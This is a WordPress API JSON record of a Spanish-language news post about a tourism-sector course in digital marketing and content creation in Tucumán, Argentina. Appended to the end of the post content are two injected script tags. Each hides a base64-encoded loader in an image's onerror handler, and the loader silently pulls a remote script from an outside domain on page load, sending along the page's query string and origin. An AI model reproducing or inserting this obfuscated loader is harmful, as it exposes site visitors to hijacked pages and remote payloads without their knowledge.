{"id":1275,"date":"2022-08-10T14:04:50","date_gmt":"2022-08-10T17:04:50","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1275"},"modified":"2025-08-14T00:38:51","modified_gmt":"2025-08-14T03:38:51","slug":"mas-herramientas-el-sector-turistico-dela-provincia-de-tucuman-se-capacito-en-creacion-de-contenido","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1275","title":{"rendered":"M\u00e1s herramientas: el sector tur\u00edstico de la provincia de Tucum\u00e1n se capacit\u00f3 en creaci\u00f3n de contenido"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#215f83\"><strong>Bajo la organizaci\u00f3n del Departamento de Capacitaci\u00f3n del Ente Tucum\u00e1n Turismo, la Agencia Insiders dict\u00f3 el curso en los salones del Hotel Bicentenario.<\/strong><\/h4>\n\n\n\n<p>Con el prop\u00f3sito de mejorar la comercializaci\u00f3n y promoci\u00f3n de los productos tur\u00edsticos de la provincia, y tras un exitoso primer m\u00f3dulo que busc\u00f3 que prestadores del sector aprendieran nociones b\u00e1sicas de planificaci\u00f3n en redes sociales, se dict\u00f3 la segunda etapa del curso \u201cMarketing Digital y Creaci\u00f3n de Contenido\u201d, impulsado por el Departamento de Capacitaci\u00f3n del Ente Tucum\u00e1n Turismo (ETT) y con la implementaci\u00f3n a cargo de la Agencia Insiders.<\/p>\n\n\n\n<p>La propuesta se enmarca dentro de la pol\u00edtica formativa del organismo estatal, con el objetivo de contar con un recurso humano profesional, responsable y actualizado para brindar a tucumanos y turistas un servicio de excelencia en los destinos locales. As\u00ed, el curso tuvo entre sus inscriptos a prestadores hoteleros, gastron\u00f3micos y de turismo activo de localidades como Taf\u00ed Viejo, Concepci\u00f3n, Santa Ana, El Cadillal, San Miguel de Tucum\u00e1n, San Pedro de Colalao, Alberdi y del Valle Calchaqu\u00ed.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"431\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/marketing1-1024x431.jpeg\" alt=\"\" class=\"wp-image-1277\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/marketing1-1024x431.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/marketing1-300x126.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/marketing1-768x323.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/marketing1-696x293.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/marketing1-1068x449.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/marketing1-998x420.jpeg 998w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/marketing1.jpeg 1198w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u201cNinguna acci\u00f3n de formaci\u00f3n aislada repercute en un beneficio\u201d, asever\u00f3 la vicepresidenta del ETT,&nbsp;<strong>Elena Colombres Garmendia<\/strong>, quien destac\u00f3 la continua labor de la instituci\u00f3n para generar espacios de aprendizaje que propendan, como en este caso, \u201ca otorgar los recursos para vender Tucum\u00e1n de la mejor manera, y que esa fuerza de venta del destino aumente con el consecuente impacto positivo que tiene para todos los que trabajamos directa e indirectamente en el sector\u201d.&nbsp;<\/p>\n\n\n\n<p>La funcionaria explic\u00f3 que las tem\u00e1ticas dictadas \u201csurgen del inter\u00e9s genuino del sector privado, que nos plantea una necesidad que luego buscamos satisfacer mediante acciones como esta\u201d. \u201cAs\u00ed como se invierte en obras, se invierte en formaci\u00f3n, porque ambas son igual de importantes\u201d, sentenci\u00f3 Colombres Garmendia.&nbsp;<\/p>\n\n\n\n<p>En esta oportunidad, bajo una modalidad te\u00f3rico-pr\u00e1ctica, los emprendedores visitaron la villa tur\u00edstica El Cadillal para aplicar cada uno de los conceptos vertidos en clase. De esta forma, los participantes produjeron y editaron fotos promocionales, videos y reels de Instagram.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>\u201cEn el primer curso aprendimos a planificar cada una de nuestras publicaciones, a segmentar nuestro p\u00fablico y presentar nuestras redes\u201d, cont\u00f3&nbsp;<strong>Camila<\/strong>, del bar tafice\u00f1o&nbsp;<strong>Rompecabezas<\/strong>, sobre la primera propuesta realizada en abril de este a\u00f1o. \u201cAhora fue todo mucho m\u00e1s pr\u00e1ctico: se produjo el contenido espec\u00edfico para cada mensaje que queremos dar dependiendo de la plataforma\u201d, agreg\u00f3. \u201cAprend\u00ed mucho y lo que m\u00e1s valoro del curso es el grupo que formamos y c\u00f3mo vamos sacando lo mejor de las experiencias de cada uno de nosotros\u201d, complet\u00f3 la gastron\u00f3mica.&nbsp;<\/p>\n\n\n\n<p><strong>Elva Maman\u00ed<\/strong>, due\u00f1a de la&nbsp;<strong>Posada Intihuatana<\/strong>, de San Pedro de Colalao, dijo que los contenidos brindados son \u201cmuy interesantes y provechosos para mi emprendimiento, un hospedaje; me sirve para mejorar cada una de mis comunicaciones, en busca de captar nuevos clientes\u201d. Asimismo, expres\u00f3: \u201clos conocimientos que adquir\u00ed en este curso tambi\u00e9n me servir\u00e1n para ayudar a otros emprendedores de San Pedro con su promoci\u00f3n\u201d. \u201cAdem\u00e1s el mensaje es claro y quiero transmitirlo a mis colegas: no hay mejor inversi\u00f3n para tu negocio que capacitarte\u201d, concluy\u00f3.&nbsp;<\/p>\n\n\n\n<p><strong>El contenido lleg\u00f3 al Valle<\/strong><\/p>\n\n\n\n<p>Tal como sucedi\u00f3 en la primera edici\u00f3n, el Ente junto a Insiders llevaron esta propuesta formativa a Taf\u00ed del Valle, donde participan emprendedores y actores de la industria de todo el valle. La capacitaci\u00f3n, que finaliza este mi\u00e9rcoles, se lleva adelante en las instalaciones del hotel Colonial de la villa tur\u00edstica.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.institucionalturismotuc.gob.ar\/noticias\/noticia\/474\/M%C3%A1s+herramientas:+el+sector+tur%C3%ADstico+se+capacit%C3%B3+en+creaci%C3%B3n+de+contenido\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_10-8-2022_14014_www.institucionalturismotuc.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1276\" width=\"333\" height=\"60\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_10-8-2022_14014_www.institucionalturismotuc.gob_.ar_.jpeg 411w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_10-8-2022_14014_www.institucionalturismotuc.gob_.ar_-300x54.jpeg 300w\" sizes=\"(max-width: 333px) 100vw, 333px\" \/><\/a><figcaption>Fuente;<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Bajo la organizaci\u00f3n del Departamento de Capacitaci\u00f3n del Ente Tucum\u00e1n Turismo, la Agencia Insiders dict\u00f3 el curso en los salones del Hotel Bicentenario. Con el prop\u00f3sito de mejorar la comercializaci\u00f3n y promoci\u00f3n de los productos tur\u00edsticos de la provincia, y tras un exitoso primer m\u00f3dulo que busc\u00f3 que prestadores del sector aprendieran nociones b\u00e1sicas de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1278,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17,6],"tags":[],"class_list":{"0":"post-1275","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales","8":"category-temas-relacionados"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1275"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1275"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1275\/revisions"}],"predecessor-version":[{"id":7399,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1275\/revisions\/7399"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1278"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1275"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}